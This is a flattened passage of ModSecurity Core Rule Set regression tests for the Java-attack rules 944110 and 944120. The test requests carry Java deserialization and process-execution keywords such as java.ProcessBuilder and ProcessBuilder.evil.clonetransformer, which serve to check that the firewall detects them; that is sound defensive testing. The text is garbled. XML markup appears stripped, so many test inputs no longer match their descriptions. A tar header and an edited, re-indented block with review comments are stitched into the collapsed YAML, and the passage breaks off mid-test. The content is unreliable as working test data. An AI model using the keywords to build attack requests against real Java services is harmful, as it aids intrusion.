and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" test: java.ProcessBuilder method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-11 desc: XML element includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "value" output: no_log_contains: "id \"944110\"" - test_title: 944110-12 desc: XML attribute name includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: no_log_contains: "id \"944110\"" - test_title: 944110-13 desc: XML attribute value includes keywords java. 
and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: log_contains: "id \"944110\"" - test_title: 944110-14 desc: XML element value includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "java.Runtime" output: log_contains: "id \"944110\"" - test_title: 944110-15 desc: XML element includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "value" output: no_log_contains: "id \"944110\"" - test_title: 944110-16 desc: XML attribute name includes keywords java. 
and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: no_log_contains: "id \"944110\"" - test_title: 944110-17 desc: XML attribute value includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: log_contains: "id \"944110\"" - test_title: 944110-18 desc: XML element value includes keywords java. 
and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "java.ProcessBuilder" output: log_contains: "id \"944110\"" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml��������0000664�0000000�0000000�00000375672�14461225151�0027711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944120.yaml" description: "Positive tests for rule 944120" tests: - test_title: 944120-0 desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 
Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.clonetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-1 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer=test" output: log_contains: "id \"944120\"" - test_title: 944120-2 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.clonetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-3 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: 
ProcessBuilder.evil.clonetransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-4 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.clonetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-5 desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-6 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-7 desc: "XML attribute value includes keyword 
ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-8 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-9 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-10 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.clonetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-11 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" output: log_contains: "id \"944120\"" - test_title: 944120-12 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-13 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
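"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.clonetransformer": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\""
  # Test 944120-14: multipart/form-data part carrying JSON, with the keyword in
  # the JSON *value*, as `desc` states. The original payload was identical to
  # 944120-13's (keyword in the JSON *name*), so the value case was never
  # exercised. 944120-31 repeats 944120-30's payload in the same way for the
  # forclosure keyword.
  # NOTE(review): the expected log entry is kept unchanged on the assumption
  # that the part body still reaches the rule with the keyword inside it;
  # confirm by running the regression suite.
  - test_title: 944120-14
    desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            # Line breaks inside the block scalar are reconstructed from the
            # multipart layout (delimiter, part headers, blank line, body,
            # closing delimiter); the page had collapsed them onto one line.
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"test": "ProcessBuilder.evil.clonetransformer"}
              -----------------------------thisissparta--
          output:
            log_contains: "id \"944120\""
- test_title: 944120-15 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; 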
boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.clonetransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.clonetransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-17 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.forclosure" output: log_contains: "id \"944120\"" - test_title: 944120-18 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 
Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure=test" output: log_contains: "id \"944120\"" - test_title: 944120-19 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.forclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-20 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.forclosure=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-21 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.forclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-22 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-23 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-24 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 
944120-25 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure" output: log_contains: "id \"944120\"" - test_title: 944120-26 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure" output: log_contains: "id \"944120\"" - test_title: 944120-27 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.forclosure" output: log_contains: "id \"944120\"" - test_title: 944120-28 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 
Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" output: log_contains: "id \"944120\"" - test_title: 944120-29 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-30 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.forclosure": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-31 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" 
stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.forclosure": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-32 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.forclosure -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.forclosure -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-34 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatefactory" output: log_contains: "id \"944120\"" - test_title: 944120-35 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory=test" output: 